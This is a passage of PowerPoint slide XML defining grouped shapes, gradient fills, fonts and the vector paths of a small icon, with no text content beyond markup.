                <a:ext cx="1715155" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5" name="Rectangle 6"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6435557" y="4036682"/>
                <a:ext cx="1661572" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Rectangle 7"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8087643" y="4036682"/>
                <a:ext cx="1720740" cy="50962"/>
              </a:xfrm>
              <a:prstGeom prst="rect">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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle 8"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1765833" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8" name="Rectangle 9"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9808382" y="4036682"/>
                <a:ext cx="1274973" cy="50962"/>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eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="1200" dirty="0">
                  <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  <a:cs typeface="Helvetica Neue"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8057" y="2772"/>
              <a:ext cx="2054" cy="3685"/>
              <a:chOff x="7980911" y="2484779"/>
              <a:chExt cx="1304470" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="10" name="Group 11"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="7980911" y="2484779"/>
                <a:ext cx="1304470" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="17" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent4"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="18" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Oval 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8347955" y="4239008"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="3810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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="12" name="Group 13"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="8468992" y="4362838"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="8216107" y="2577307"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="AutoShape 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8216107" y="2577307"/>
                  <a:ext cx="464344" cy="464344"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10800 87"/>
                    <a:gd name="T1" fmla="*/ T0 w 21426"/>
                    <a:gd name="T2" fmla="+- 0 10799 73"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T4" fmla="+- 0 10800 87"/>
                    <a:gd name="T5" fmla="*/ T4 w 21426"/>
                    <a:gd name="T6" fmla="+- 0 10799 73"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T8" fmla="+- 0 10800 87"/>
                    <a:gd name="T9" fmla="*/ T8 w 21426"/>
                    <a:gd name="T10" fmla="+- 0 10799 73"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21453"/>
                    <a:gd name="T12" fmla="+- 0 10800 87"/>
                    <a:gd name="T13" fmla="*/ T12 w 21426"/>
                    <a:gd name="T14" fmla="+- 0 10799 73"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21453"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21426" h="21453">
                      <a:moveTo>
                        <a:pt x="8034" y="20112"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5816" y="17892"/>
                        <a:pt x="3556" y="15628"/>
                        <a:pt x="1338" y="13408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3241" y="7240"/>
                        <a:pt x="11488" y="7509"/>
                        <a:pt x="13391" y="1341"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15609" y="3560"/>
                        <a:pt x="17869" y="5825"/>
                        <a:pt x="20087" y="8045"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18184" y="14212"/>
                        <a:pt x="9937" y="13944"/>
                        <a:pt x="8034" y="20112"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="21034" y="7097"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="14338" y="393"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14006" y="60"/>
                        <a:pt x="13525" y="-73"/>
                        <a:pt x="13069" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12828" y="98"/>
                        <a:pt x="12614" y="222"/>
                        <a:pt x="12444" y="393"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12292" y="545"/>
                        <a:pt x="12177" y="733"/>
                        <a:pt x="12112" y="944"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11808" y="1929"/>
                        <a:pt x="11283" y="2785"/>
                        <a:pt x="10507" y="3562"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9471" y="4598"/>
                        <a:pt x="8121" y="5384"/>
                        <a:pt x="6693" y="6214"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5177" y="7094"/>
                        <a:pt x="3611" y="8006"/>
                        <a:pt x="2328" y="9290"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1237" y="10383"/>
                        <a:pt x="493" y="11600"/>
                        <a:pt x="59" y="13011"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-87" y="13488"/>
                        <a:pt x="40" y="14004"/>
                        <a:pt x="391" y="14356"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="7087" y="21060"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7419" y="21393"/>
                        <a:pt x="7900" y="21526"/>
                        <a:pt x="8356" y="21414"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8597" y="21354"/>
                        <a:pt x="8811" y="21231"/>
                        <a:pt x="8981" y="21060"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9133" y="20908"/>
                        <a:pt x="9248" y="20720"/>
                        <a:pt x="9314" y="20508"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9617" y="19523"/>
                        <a:pt x="10142" y="18667"/>
                        <a:pt x="10918" y="17890"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11954" y="16853"/>
                        <a:pt x="13304" y="16069"/>
                        <a:pt x="14733" y="15239"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16248" y="14357"/>
                        <a:pt x="17814" y="13446"/>
                        <a:pt x="19097" y="12162"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20188" y="11070"/>
                        <a:pt x="20932" y="9852"/>
                        <a:pt x="21366" y="8440"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21512" y="7965"/>
                        <a:pt x="21385" y="7448"/>
                        <a:pt x="21034" y="7097"/>
                      </a:cubicBezTo>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14" name="AutoShape 53"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8390732" y="2736850"/>
                  <a:ext cx="125413" cy="130175"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10801 59"/>
                    <a:gd name="T1" fmla="*/ T0 w 21484"/>
                    <a:gd name="T2" fmla="+- 0 10799 41"/>
                    <a:gd name="T3" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T4" fmla="+- 0 10801 59"/>
                    <a:gd name="T5" fmla="*/ T4 w 21484"/>
                    <a:gd name="T6" fmla="+- 0 10799 41"/>
                    <a:gd name="T7" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T8" fmla="+- 0 10801 59"/>
                    <a:gd name="T9" fmla="*/ T8 w 21484"/>
                    <a:gd name="T10" fmla="+- 0 10799 41"/>
                    <a:gd name="T11" fmla="*/ 10799 h 21516"/>
                    <a:gd name="T12" fmla="+- 0 10801 59"/>
                    <a:gd name="T13" fmla="*/ T12 w 21484"/>
                    <a:gd name="T14" fmla="+- 0 10799 41"/>
                    <a:gd name="T15" fmla="*/ 10799 h 21516"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21484" h="21516">
                      <a:moveTo>
                        <a:pt x="17511" y="14987"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="17287" y="15384"/>
                        <a:pt x="17032" y="15740"/>
                        <a:pt x="16731" y="16049"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15340" y="14692"/>
                        <a:pt x="13947" y="13205"/>
                        <a:pt x="12559" y="11675"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12912" y="11521"/>
                        <a:pt x="13287" y="11362"/>
                        <a:pt x="13689" y="11198"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14092" y="11034"/>
                        <a:pt x="14494" y="10927"/>
                        <a:pt x="14895" y="10861"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15308" y="10801"/>
                        <a:pt x="15715" y="10819"/>
                        <a:pt x="16122" y="10913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16527" y="11011"/>
                        <a:pt x="16909" y="11222"/>
                        <a:pt x="17262" y="11554"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17612" y="11890"/>
                        <a:pt x="17835" y="12244"/>
                        <a:pt x="17923" y="12620"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18020" y="13004"/>
                        <a:pt x="18025" y="13392"/>
                        <a:pt x="17958" y="13789"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17883" y="14187"/>
                        <a:pt x="17738" y="14585"/>
                        <a:pt x="17511" y="14987"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="5799" y="10193"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="5096" y="10221"/>
                        <a:pt x="4482" y="9996"/>
                        <a:pt x="3946" y="9496"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3717" y="9285"/>
                        <a:pt x="3558" y="9028"/>
                        <a:pt x="3461" y="8724"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3359" y="8420"/>
                        <a:pt x="3326" y="8088"/>
                        <a:pt x="3366" y="7723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3397" y="7363"/>
                        <a:pt x="3509" y="6989"/>
                        <a:pt x="3703" y="6610"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3889" y="6231"/>
                        <a:pt x="4160" y="5852"/>
                        <a:pt x="4510" y="5487"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5768" y="6694"/>
                        <a:pt x="7022" y="8018"/>
                        <a:pt x="8282" y="9388"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7330" y="9893"/>
                        <a:pt x="6501" y="10164"/>
                        <a:pt x="5799" y="10193"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="19678" y="8570"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18868" y="7915"/>
                        <a:pt x="18055" y="7470"/>
                        <a:pt x="17235" y="7250"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16421" y="7031"/>
                        <a:pt x="15603" y="6942"/>
                        <a:pt x="14779" y="6998"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13964" y="7059"/>
                        <a:pt x="13130" y="7236"/>
                        <a:pt x="12296" y="7545"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11462" y="7859"/>
                        <a:pt x="10625" y="8200"/>
                        <a:pt x="9782" y="8593"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8448" y="7115"/>
                        <a:pt x="7114" y="5658"/>
                        <a:pt x="5778" y="4299"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6382" y="3775"/>
                        <a:pt x="6963" y="3509"/>
                        <a:pt x="7526" y="3490"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8088" y="3467"/>
                        <a:pt x="8631" y="3523"/>
                        <a:pt x="9145" y="3649"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9669" y="3775"/>
                        <a:pt x="10149" y="3883"/>
                        <a:pt x="10590" y="3967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11038" y="4051"/>
                        <a:pt x="11424" y="3958"/>
                        <a:pt x="11765" y="3682"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12123" y="3382"/>
                        <a:pt x="12321" y="2994"/>
                        <a:pt x="12351" y="2526"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12376" y="2054"/>
                        <a:pt x="12189" y="1596"/>
                        <a:pt x="11782" y="1147"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11258" y="569"/>
                        <a:pt x="10630" y="216"/>
                        <a:pt x="9872" y="85"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9126" y="-41"/>
                        <a:pt x="8358" y="-30"/>
                        <a:pt x="7564" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6780" y="309"/>
                        <a:pt x="6032" y="595"/>
                        <a:pt x="5324" y="997"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4617" y="1399"/>
                        <a:pt x="4048" y="1811"/>
                        <a:pt x="3626" y="2213"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3464" y="2066"/>
                        <a:pt x="3302" y="1918"/>
                        <a:pt x="3141" y="1773"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2963" y="1614"/>
                        <a:pt x="2739" y="1530"/>
                        <a:pt x="2471" y="1535"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2200" y="1535"/>
                        <a:pt x="1977" y="1647"/>
                        <a:pt x="1793" y="1853"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1615" y="2054"/>
                        <a:pt x="1530" y="2288"/>
                        <a:pt x="1565" y="2536"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1589" y="2793"/>
                        <a:pt x="1696" y="2989"/>
                        <a:pt x="1880" y="3139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2044" y="3270"/>
                        <a:pt x="2203" y="3401"/>
                        <a:pt x="2364" y="3537"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1731" y="4276"/>
                        <a:pt x="1207" y="5094"/>
                        <a:pt x="795" y="5957"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="378" y="6820"/>
                        <a:pt x="130" y="7676"/>
                        <a:pt x="37" y="8509"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-59" y="9346"/>
                        <a:pt x="33" y="10113"/>
                        <a:pt x="298" y="10824"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="566" y="11540"/>
                        <a:pt x="1056" y="12148"/>
                        <a:pt x="1774" y="12723"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2942" y="13658"/>
                        <a:pt x="4321" y="14056"/>
                        <a:pt x="5915" y="13967"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7507" y="13874"/>
                        <a:pt x="9223" y="13415"/>
                        <a:pt x="11064" y="12461"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12532" y="14093"/>
                        <a:pt x="14002" y="15716"/>
                        <a:pt x="15470" y="17223"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14849" y="17728"/>
                        <a:pt x="14305" y="18018"/>
                        <a:pt x="13826" y="18111"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13344" y="18210"/>
                        <a:pt x="12917" y="18200"/>
                        <a:pt x="12530" y="18088"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12142" y="17971"/>
                        <a:pt x="11782" y="17803"/>
                        <a:pt x="11455" y="17587"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11125" y="17368"/>
                        <a:pt x="10799" y="17181"/>
                        <a:pt x="10474" y="17026"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10154" y="16872"/>
                        <a:pt x="9823" y="16788"/>
                        <a:pt x="9486" y="16783"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9145" y="16778"/>
                        <a:pt x="8785" y="16937"/>
                        <a:pt x="8388" y="17265"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7981" y="17606"/>
                        <a:pt x="7777" y="18004"/>
                        <a:pt x="7777" y="18453"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7777" y="18897"/>
                        <a:pt x="7991" y="19351"/>
                        <a:pt x="8408" y="19809"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8830" y="20268"/>
                        <a:pt x="9379" y="20651"/>
                        <a:pt x="10042" y="20955"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10708" y="21259"/>
                        <a:pt x="11455" y="21451"/>
                        <a:pt x="12279" y="21502"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13103" y="21559"/>
                        <a:pt x="13970" y="21437"/>
                        <a:pt x="14886" y="21109"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15807" y="20787"/>
                        <a:pt x="16721" y="20202"/>
                        <a:pt x="17617" y="19332"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18051" y="19739"/>
                        <a:pt x="18489" y="20127"/>
                        <a:pt x="18921" y="20501"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19107" y="20656"/>
                        <a:pt x="19328" y="20731"/>
                        <a:pt x="19601" y="20712"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19861" y="20703"/>
                        <a:pt x="20090" y="20586"/>
                        <a:pt x="20269" y="20375"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20455" y="20160"/>
                        <a:pt x="20532" y="19921"/>
                        <a:pt x="20503" y="19674"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20477" y="19421"/>
                        <a:pt x="20371" y="19229"/>
                        <a:pt x="20192" y="19089"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19755" y="18752"/>
                        <a:pt x="19321" y="18397"/>
                        <a:pt x="18884" y="18022"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19626" y="17143"/>
                        <a:pt x="20221" y="16217"/>
                        <a:pt x="20664" y="15300"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21103" y="14379"/>
                        <a:pt x="21367" y="13490"/>
                        <a:pt x="21453" y="12667"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21540" y="11839"/>
                        <a:pt x="21439" y="11091"/>
                        <a:pt x="21159" y="10412"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20880" y="9725"/>
                        <a:pt x="20386" y="9135"/>
                        <a:pt x="19678" y="8570"/>
                      </a:cubicBezTo>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15" name="AutoShape 54"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8375650" y="2896394"/>
                  <a:ext cx="70644" cy="73819"/>
                </a:xfrm>
                <a:custGeom>
